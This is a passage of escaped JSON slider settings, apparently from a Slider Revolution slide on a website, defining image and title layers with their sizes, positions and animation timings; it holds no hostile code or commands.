To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":250,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"Image 11\",\"alias\":\"Little leaf 2\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic5.png\",\"imageId\":3235},\"size\":{\"width\":{\"d\":{\"v\":\"319px\",\"e\":true},\"n\":{\"v\":\"182px\",\"e\":true},\"t\":{\"v\":\"182px\"},\"m\":{\"v\":\"88px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"134px\",\"e\":true},\"n\":{\"v\":\"76px\",\"e\":true},\"t\":{\"v\":\"76px\"},\"m\":{\"v\":\"37px\",\"e\":true}},\"originalWidth\":319,\"originalHeight\":134,\"aspectRatio\":{\"d\":{\"v\":2.3805970149253732},\"n\":{\"v\":2.3805970149253732},\"t\":{\"v\":2.3805970149253732},\"m\":{\"v\":2.3805970149253732}}},\"position\":{\"x\":{\"d\":{\"v\":\"1121px\",\"e\":true},\"n\":{\"v\":\"18px\",\"e\":true},\"t\":{\"v\":\"715px\",\"e\":true},\"m\":{\"v\":\"359px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"133px\",\"e\":true},\"n\":{\"v\":\"260px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"147px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"1\":{\"text\":\"Image 1\",\"alias\":\"Flaster\",\"uid\":1,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic1.png\",\"imageId\":3222},\"size\":{\"width\":{\"d\":{\"v\":\"286px\",\"e\":true},\"n\":{\"v\":\"201px\",\"e\":true},\"t\":{\"v\":\"201px\",\"e\":true},\"m\":{\"v\":\"140px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"168px\",\"e\":true},\"n\":{\"v\":\"118px\",\"e\":true},\"t\":{\"v\":\"118px\",\"e\":true},\"m\":{\"v\":\"82px\",\"e\":true}},\"originalWidth\":286,\"originalHeight\":168,\"aspectRatio\":{\"d\":{\"v\":1.7023809523809523},\"n\":{\"v\":1.7023809523809523},\"t\":{\"v\":1.7023809523809523},\"m\":{\"v\":1.7023809523809523}}},\"position\":{\"x\":{\"d\":{\"v\":\"-90px\",\"e\":true},\"n\":{\"v\":\"710px\",\"e\":true},\"t\":{\"v\":\"-88px\",\"e\":true},\"m\":{\"v\":\"-104px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"105px\",\"e\":true},\"n\":{\"v\":\"329px\",\"e\":true},\"t\":{\"v\":\"78px\",\"e\":true},\"m\":{\"v\":\"58px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":13,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":13,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":990},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1440,\"start\":990,\"startRelative\":990},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1440,\"start\":990,\"startRelative\":990},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":570,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"23\":{\"text\":\"Image 14\",\"alias\":\"Cvetic\",\"uid\":23,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic3.png\",\"imageId\":3238},\"size\":{\"width\":{\"d\":{\"v\":\"120px\",\"e\":true},\"n\":{\"v\":\"88px\",\"e\":true},\"t\":{\"v\":\"86px\",\"e\":true},\"m\":{\"v\":\"86px\"}},\"height\":{\"d\":{\"v\":\"108px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"77px\",\"e\":true},\"m\":{\"v\":\"77px\"}},\"originalWidth\":120,\"originalHeight\":108,\"aspectRatio\":{\"d\":{\"v\":1.1111111111111112},\"n\":{\"v\":1.1111111111111112},\"t\":{\"v\":1.1111111111111112},\"m\":{\"v\":1.1111111111111112}}},\"position\":{\"x\":{\"d\":{\"v\":\"-558px\",\"e\":true},\"n\":{\"v\":\"-452px\",\"e\":true},\"t\":{\"v\":\"-251px\",\"e\":true},\"m\":{\"v\":\"-251px\"}},\"y\":{\"d\":{\"v\":\"-189px\",\"e\":true},\"n\":{\"v\":\"-127px\",\"e\":true},\"t\":{\"v\":\"31px\",\"e\":true},\"m\":{\"v\":\"31px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":480},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":480,\"startRelative\":480},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1720,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\",\"version\":\"6.6.0\"},\"22\":{\"text\":\"Pure & Natural\",\"alias\":\"Title\",\"uid\":22,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"v\":\"397px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"-341px\",\"e\":true},\"n\":{\"v\":\"-219px\",\"e\":true},\"t\":{\"v\":\"-34px\",\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-86px\",\"e\":true},\"n\":{\"v\":\"-45px\",\"e\":true},\"t\":{\"v\":\"137px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":15,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":15,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":550},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":800,\"start\":550,\"startRelative\":550},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1650,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#171717\",\"e\":true},\"n\":{\"v\":\"#171717\",\"e\":true},\"t\":{\"v\":\"#171717\",\"e\":true},\"m\":{\"v\":\"#171717\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"80px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"45px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\"